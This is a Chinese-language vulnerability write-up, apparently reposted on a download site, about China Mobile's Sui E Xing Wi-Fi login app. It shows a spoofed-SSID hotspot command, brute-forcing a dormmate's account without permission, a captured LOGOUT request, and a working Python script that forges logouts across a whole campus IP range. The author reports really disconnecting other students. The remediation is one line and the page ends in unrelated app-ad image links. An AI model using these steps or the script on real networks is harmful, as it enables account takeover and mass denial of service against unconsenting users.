移动随E行应用在用户登陆时,没做任何限制,导致账号被爆破的可能。另外在上线和下线时,后台是通过表单里的wlanuserip字段来为判断依据,该字段可控明显有问题。 测试目标:移动最新IOS版随E行
无线网测试环境:CMCC-EDU
老规矩首先用电脑连上CMCC-EDU网络
接着CMD下:
netsh wlan set hostednetwork mode=allow ssid=CMCC-EDU key=00000000&&netsh wlan start hostednetwork解释下,这是用来共享wifi信号,相信许多同学都用过,注意这里这里的SSID要和公共热点名称一样,因为用随E行登陆时,它会判断你的SSID是否为移动的热点名称。做这些准备是为了抓取手机的HTTP包(对于开放网络抓包可以不用这样麻烦,只是为了更好的演示),然后电脑打开Burpsuite代理(监听所有接口),接着用手机连上自己CMCC-EDU信号(注意是加锁的),设置好代理地址和端口
这些准备工作做完就可以打开随E行登陆抓包了,演示方便拿我宿友的账号来做测试,我不知道他的密码,其实他自己也不知道,因为他平时只用动态密码。
抓包图如下:
抓到包后就可以爆破了,然后就是耐心的等待,返回内容里包含LOGOUT意味着成功爆破
运气还不错一会就爆破到了,密码:207891。此时已是登陆状态,已经可以上网了,想验证爆破出来的密码是否正确,需要先退出在登陆。接着抓取退出的POST包,具体内容如下:
POST /suiexingclient.jsp HTTP/1.1
Host: 211.138.195.124
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=rv4GT5dphVVcTC1y0kQR9K2F2p1Nn2VmlBJJpB5G91lxlMynYh7M!-189125796; sto-id-20480=BCFBIFKMJABP
Accept-Language: zh-cn
Accept: */*
Content-Length: 108
Connection: keep-alive
User-Agent: G3WLAN
wlanacssid=CMCC&wlanacname=0116.0510.250.00&wlanuserip=10.31.111.58&actiontype=LOGOUT&logonsessid=1480830767通过发送的内容可以看出,可能通过字段里的IP来实现下线的,为了验证这一想法,可以修改IP内容,我们学校的IP范围在10.31.110.1-10.31.117.255,写个脚本验证下。
import socket
import httplib2
import urllib
def get_my_ip():
try:
csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
csock.connect(('8.8.8.8', 80))
(addr, port) = csock.getsockname()
csock.close()
return addr
except socket.error:
return "127.0.0.1"
def offline(ip):
urlstr = 'http://211.138.195.124/suiexingclient.jsp'
data = dict(wlanacname="0116.0510.250.00",wlanuserip=ip,actiontype="LOGOUT",logonsessid="480050378")
h = httplib2.Http('.cache')
response,content = h.request(
urlstr,
'POST',
urllib.parse.urlencode(data),
headers={'Content-Type': 'application/x-www-form-urlencoded'}
)
#sleep(100)
print(ip+"下线成功!")
if __name__ == "__main__":
ip=get_my_ip()
offline(ip)
for i in range(110,120):
for j in range(0,255):
offline("10.31."+str(i)+"."+str(j))
上隔壁宿舍问了几个上CMCC-EDU网的同学,果然都断线了。(据我所知,移动的无线网络都是在10.x.x.x网段,你懂得。)
修复方案:
做好限制
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;
![英雄棋士团(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/yingxiongqishituanyuxiazai.jpg)
![美食小当家?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/meishixiaodangjia.png)
![2047?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/2047.jpg)
![荣誉指挥官(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/rongyuzhihuiguanyuxiazai.png)
![繁荣美食市场物语?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/fanrongmeishishichangwuyu.jpg)
![夸克浏览器 v4.2.1.138 好用的手机浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/kuakezuolanqi.jpg)
![移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/yidongbangongruanjian.jpg)
![乐秀视频编辑器 VideoShow v8.8.4 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/lexiushipinbianjiqi.png)
![X 浏览器 v3.3.9 一款小巧的安卓浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/x.jpg)
![安卓密码管理软件 Enpass v6.4.5.368 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/anzhuomimaguanliruanjian.jpg)
![差分复制同步 FastCopy-M v3.6.3.51 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/FastCopy3.png)
![多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Clover.png)
![文件重命名 Advanced Renamer v3.85 Lite 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Advanced_Renamer.png)
![网络防火监控 GlassWire Elite v2.1.166 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/GlassWire.png)
![影音播放器 Daum Potplayer v1.7.20538 美化便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/PotPlayer.png)
